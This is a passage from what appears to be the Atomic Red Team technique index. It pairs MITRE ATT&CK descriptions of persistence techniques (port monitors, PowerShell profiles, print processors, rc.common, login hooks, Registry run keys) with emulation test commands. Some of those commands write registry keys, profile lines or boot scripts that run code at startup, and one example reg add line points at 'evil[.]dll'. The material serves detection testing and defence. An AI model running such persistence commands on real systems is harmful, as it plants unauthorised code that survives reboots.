'2020-07-01T18:23:25.002Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: Record network packets sent to and from the system, looking - for extraneous packets that do not belong to established flows. - x_mitre_data_sources: - - Netflow/Enclave netflow - - Packet capture - x_mitre_platforms: - - Linux - - macOS - - Windows - - Network - atomic_tests: [] - T1547.010: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.010 - url: https://attack.mitre.org/techniques/T1547/010 - - url: http://msdn.microsoft.com/en-us/library/dd183341 - description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12, - 2014. - source_name: AddMonitor - - url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf - description: Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint - slides]. Retrieved November 12, 2014. - source_name: Bloxham - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Port Monitors - description: "Adversaries may use port monitors to run an attacker supplied - DLL during system boot for persistence or privilege escalation. A port monitor - can be set through the AddMonitor API call to set a DLL to be - loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 - and will be loaded by the print spooler service, spoolsv.exe, on boot. The - spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) - Alternatively, an arbitrary DLL can be loaded if permissions allow writing - a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. - \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* - Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this - technique to load malicious code at startup that will persist on system reboot - and execute as SYSTEM." - id: attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-01-24T19:46:27.750Z' - created: '2020-01-24T19:46:27.750Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_detection: "Monitor process API calls to AddMonitor.(Citation: - AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are - abnormal. New DLLs written to the System32 directory that do not correlate - with known good software or patching may be suspicious. \n\nMonitor Registry - writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. - Run the Autoruns utility, which checks for this Registry key as a persistence - mechanism (Citation: TechNet Autoruns)" - x_mitre_data_sources: - - File monitoring - - API monitoring - - DLL monitoring - - Windows Registry - - Process monitoring - x_mitre_contributors: - - Stefan Kanthak - - Travis Smith, Tripwire - x_mitre_platforms: - - Windows - identifier: T1547.010 - atomic_tests: - - name: Add Port Monitor persistence in Registry - auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 - description: Add key-value pair to a Windows Port Monitor registry. On the subsequent - reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. - supported_platforms: - - windows - input_arguments: - monitor_dll: - description: Addition to port monitor registry key. Normally refers to a - DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions - allow writing a fully-qualified pathname for that DLL. - type: Path - default: C:\Path\AtomicRedTeam.dll - executor: - command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" - /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - -' - cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" - -' - name: command_prompt - elevation_required: true - T1546.013: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.013 - url: https://attack.mitre.org/techniques/T1546/013 - - source_name: Microsoft About Profiles - url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6 - description: Microsoft. (2017, November 29). About Profiles. Retrieved June - 14, 2019. - - source_name: ESET Turla PowerShell May 2019 - url: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ - description: Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell - usage. Retrieved June 14, 2019. - - source_name: Wits End and Shady PowerShell Profiles - url: https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html - description: 'DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege - Elevation using the Powershell Profile. Retrieved July 8, 2019.' - - url: http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf - description: Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING - CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016. - source_name: Malware Archaeology PowerShell Cheat Sheet - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: PowerShell Profile - description: "Adversaries may gain persistence and elevate privileges by executing - malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) - is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) - starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) - supports several profiles depending on the user or host program. For example, - there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) - host programs such as the PowerShell console, PowerShell ISE or Visual Studio - Code. An administrator can also configure a profile that applies to all users - and host programs on the local computer. (Citation: Microsoft About Profiles) - \n\nAdversaries may modify these profiles to include arbitrary commands, functions, - modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) - drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) - session the modified script will be executed unless the -NoProfile - flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) - \n\nAn adversary may also be able to escalate privileges if a script in a - PowerShell profile is loaded and executed by an account with higher privileges, - such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)" - id: attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T21:31:31.082Z' - created: '2020-01-24T15:11:02.758Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include: - - * $PsHome\Profile.ps1 - * $PsHome\Microsoft.{HostProgram}_profile.ps1 - * $Home\My Documents\PowerShell\Profile.ps1 - * $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1 - - Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs. - x_mitre_data_sources: - - PowerShell logs - - File monitoring - - Process command-line parameters - - Process monitoring - x_mitre_contributors: - - Allen DeRyke, ICE - x_mitre_platforms: - - Windows - identifier: T1546.013 - atomic_tests: - - name: Append malicious start-process cmdlet - auto_generated_guid: '090e5aa5-32b6-473b-a49b-21e843a56896' - description: 'Appends a start process cmdlet to the current user''s powershell - profile pofile that points to a malicious executable. Upon execution, calc.exe - will be launched. - -' - supported_platforms: - - windows - input_arguments: - exe_path: - description: Path the malicious executable - type: Path - default: calc.exe - ps_profile: - description: Powershell profile to use - type: String - default: "$profile" - dependency_executor_name: powershell - dependencies: - - description: 'Ensure a powershell profile exists for the current user - -' - prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - -' - get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - -' - executor: - command: | - Add-Content #{ps_profile} -Value "" - Add-Content #{ps_profile} -Value "Start-Process #{exe_path}" - powershell -Command exit - cleanup_command: | - $oldprofile = cat $profile | Select-Object -skiplast 1 - Set-Content $profile -Value $oldprofile - name: powershell - T1542: - technique: - id: attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e - description: |- - Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting) - - Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses. - name: Pre-OS Boot - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1542 - url: https://attack.mitre.org/techniques/T1542 - - source_name: Wikipedia Booting - url: https://en.wikipedia.org/wiki/Booting - description: Wikipedia. (n.d.). Booting. Retrieved November 13, 2019. - - url: https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html - description: Pinola, M. (2014, December 14). 3 tools to check your hard drive's - health and make sure it's not already dying on you. Retrieved October 2, - 2018. - source_name: ITWorld Hard Disk Health Dec 2014 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-10-22T16:35:54.740Z' - created: '2019-11-13T14:44:49.439Z' - x_mitre_platforms: - - Linux - - Windows - - Network - x_mitre_data_sources: - - VBR - - MBR - - Component firmware - - Process monitoring - - Disk forensics - - EFI - - BIOS - - API monitoring - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_defense_bypassed: - - Anti-virus - - Host intrusion prevention systems - - File monitoring - x_mitre_version: '1.1' - x_mitre_detection: |- - Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching. - - Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014) - x_mitre_is_subtechnique: false - atomic_tests: [] - T1547.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.012 - url: https://attack.mitre.org/techniques/T1547/012 - - source_name: Microsoft AddPrintProcessor May 2018 - url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor - description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved - October 5, 2020. - - source_name: ESET PipeMon May 2020 - url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ - description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti - Group. Retrieved August 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Print Processors - description: "Adversaries may abuse print processors to run malicious DLLs during - system boot for persistence and/or privilege escalation. Print processors - are DLLs that are loaded by the print spooler service, spoolsv.exe, during - boot. \n\nAdversaries may abuse the print spooler service by adding print - processors that load malicious DLLs at startup. A print processor can be installed - through the AddPrintProcessor API call with an account that has - SeLoadDriverPrivilege enabled. Alternatively, a print processor - can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet - or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: - e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry - key that points to the DLL. For the print processor to be correctly installed, - it must be located in the system print-processor directory that can be found - with the GetPrintProcessorDirectory API call.(Citation: Microsoft - AddPrintProcessor May 2018) After the print processors are installed, the - print spooler service, which starts during boot, must be restarted in order - for them to run.(Citation: ESET PipeMon May 2020) The print spooler service - runs under SYSTEM level permissions, therefore print processors installed - by an adversary may run under elevated privileges." - id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T16:05:36.344Z' - created: '2020-10-05T13:24:49.780Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations. - - Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious. - x_mitre_data_sources: - - Process monitoring - - Windows Registry - - File monitoring - - DLL monitoring - - API monitoring - x_mitre_contributors: - - Mathieu Tartare, ESET - x_mitre_platforms: - - Windows - atomic_tests: [] - T1542.004: - technique: - created: '2020-10-20T00:05:48.790Z' - modified: '2020-10-22T02:18:19.568Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - type: attack-pattern - id: attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc - description: |- - Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks) - - - ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect. - name: ROMMONkit - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1542.004 - url: https://attack.mitre.org/techniques/T1542/004 - - source_name: Cisco Synful Knock Evolution - url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices - description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco - IOS devices. Retrieved October 19, 2020. - - source_name: Cisco Blog Legacy Device Attacks - url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 - description: Omar Santos. (2020, October 19). Attackers Continue to Target - Legacy Devices. Retrieved October 20, 2020. - x_mitre_platforms: - - Network - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_detection: There are no documented means for defenders to validate the - operation of the ROMMON outside of vendor support. If a network device is - suspected of being compromised, contact the vendor to assist in further investigation. - x_mitre_permissions_required: - - Administrator - x_mitre_data_sources: - - File monitoring - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture - atomic_tests: [] - T1037.004: - technique: - id: attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211 - description: |- - Adversaries may use rc.common automatically executed at boot initialization to establish persistence. During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated mechanism in favor of [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) but is currently still used. - - Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user. (Citation: Methods of Mac Malware Persistence) - name: Rc.common - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1037.004 - url: https://attack.mitre.org/techniques/T1037/004 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html - description: Apple. (2016, September 13). Startup Items. Retrieved July 11, - 2017. - source_name: Startup Items - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:46:20.433Z' - created: '2020-01-15T16:25:22.260Z' - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: 'The /etc/rc.common file can be monitored to - detect changes from the company policy. Monitor process execution resulting - from the rc.common script for unusual or unknown applications or behavior. ' - x_mitre_permissions_required: - - root - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1037.004 - atomic_tests: - - name: rc.common - auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de - description: | - Modify rc.common - - [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) - supported_platforms: - - macos - executor: - command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello - World"'' >> /etc/rc.common - -' - elevation_required: true - name: bash - T1547.007: - technique: - created: '2020-01-24T18:15:06.641Z' - modified: '2020-01-24T19:51:37.795Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e - description: "Adversaries may modify plist files to automatically run an application - when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain - applications to be re-opened when a user logs into their machine after reboot. - While this is usually done via a Graphical User Interface (GUI) on an app-by-app - basis, there are property list files (plist) that contain this information - as well located at ~/Library/Preferences/com.apple.loginwindow.plist - and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. - \n\nAn adversary can modify one of these files directly to include a link - to their malicious executable to provide a persistence mechanism each time - the user reboots their machine (Citation: Methods of Mac Malware Persistence)." - name: Re-opened Applications - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.007 - url: https://attack.mitre.org/techniques/T1547/007 - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - File monitoring - x_mitre_detection: Monitoring the specific plist files associated with reopening - applications can indicate when an application has registered itself to be - reopened. - x_mitre_permissions_required: - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1547.007 - atomic_tests: - - name: Re-Opened Applications - auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba - description: | - Plist Method - - [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) - supported_platforms: - - macos - executor: - steps: | - 1. create a custom plist: - - ~/Library/Preferences/com.apple.loginwindow.plist - - or - - ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist - name: manual - - name: Re-Opened Applications - auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb - description: | - Mac Defaults - - [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) - supported_platforms: - - macos - input_arguments: - script: - description: path to script - type: path - default: "/path/to/script" - executor: - command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - -' - cleanup: 'sudo defaults delete com.apple.loginwindow LoginHook - -' - elevation_required: true - name: sh - T1108: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1108 - url: https://attack.mitre.org/techniques/T1108 - - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf - description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage - Units. Retrieved July 18, 2016. - source_name: Mandiant APT1 - description: "**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), - [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External - Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n\nAdversaries - may use more than one remote access tool with varying command and control - protocols or credentialed access to remote services so they can maintain access - if an access mechanism is detected or mitigated. \n\nIf one type of tool is - detected and blocked or removed as a response but the organization did not - gain a full understanding of the adversary's tools and access, then the adversary - will be able to retain access to the network. Adversaries may also attempt - to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) - to use [External Remote Services](https://attack.mitre.org/techniques/T1133) - such as external VPNs as a way to maintain access despite interruptions to - remote access tools deployed within a target network.(Citation: Mandiant APT1) - Adversaries may also retain access through cloud-based infrastructure and - applications.\n\nUse of a [Web Shell](https://attack.mitre.org/techniques/T1100) - is one such way to maintain access to a network through an externally accessible - Web server." - name: Redundant Access - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--6aabc5ec-eae6-422c-8311-38d45ee9838a - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-30T13:47:29.922Z' - created: '2017-05-31T21:31:18.867Z' - x_mitre_deprecated: true - x_mitre_is_subtechnique: false - x_mitre_version: '3.0' - x_mitre_data_sources: - - Office 365 account logs - - Azure activity logs - - AWS CloudTrail logs - - Stackdriver logs - - Process monitoring - - Process use of network - - Packet capture - - Network protocol analysis - - File monitoring - - Authentication logs - - Binary file metadata - x_mitre_defense_bypassed: - - Network intrusion detection system - - Anti-virus - x_mitre_detection: |- - Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost. - - Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators. - - If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation. - - For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information. - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - SaaS - - Azure AD - x_mitre_permissions_required: - - User - - Administrator - - SYSTEM - x_mitre_contributors: - - Praetorian - atomic_tests: [] - T1547.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.001 - url: https://attack.mitre.org/techniques/T1547/001 - - external_id: CAPEC-270 - source_name: capec - url: https://capec.mitre.org/data/definitions/270.html - - url: http://msdn.microsoft.com/en-us/library/aa376977 - description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November - 12, 2014. - source_name: Microsoft Run Key - - source_name: Microsoft Wow6432Node 2018 - url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry - description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data - in the Registry. Retrieved August 3, 2020. - - source_name: Malwarebytes Wow6432Node 2016 - url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ - description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved - August 3, 2020. - - url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key - description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry - Key. Retrieved June 29, 2018. - source_name: Microsoft RunOnceEx APR 2018 - - url: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ - description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden - from Autoruns.exe. Retrieved June 29, 2018. - source_name: Oddvar Moe RunOnceEx Mar 2018 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Registry Run Keys / Startup Folder - description: |- - Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. - - Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. - - The following run keys are created by default on Windows systems: - - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce - - Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) - - The following Registry keys can be used to set startup folder items for persistence: - - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders - - The following Registry keys can control automatic startup of services during boot: - - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices - - Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: - - * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run - * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run - - The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. - - Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. - - By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. - - Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. - id: attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-08-03T16:30:26.918Z' - created: '2020-01-23T22:02:48.566Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. - - Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_data_sources: - - Windows Registry - - File monitoring - x_mitre_contributors: - - Oddvar Moe, @oddvarmoe - x_mitre_platforms: - - Windows - identifier: T1547.001 - 